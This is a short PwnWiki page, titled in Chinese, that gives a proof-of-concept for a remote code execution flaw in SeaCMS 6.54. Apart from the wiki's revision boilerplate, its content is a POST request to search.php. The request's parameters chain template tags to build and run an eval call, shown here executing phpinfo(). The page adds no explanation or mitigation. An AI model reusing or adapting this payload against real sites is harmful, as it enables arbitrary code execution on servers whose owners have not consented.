Seacms6.54 遠程代碼執行漏洞

From PwnWiki
Revision as of 13:18, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://192.168.0.6/seacms654/search.php POST: searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{search...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

http://192.168.0.6/seacms654/search.php
POST:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
Retrieved from "https://pwnwiki.com/index.php?title=Seacms6.54_遠程代碼執行漏洞&oldid=1452"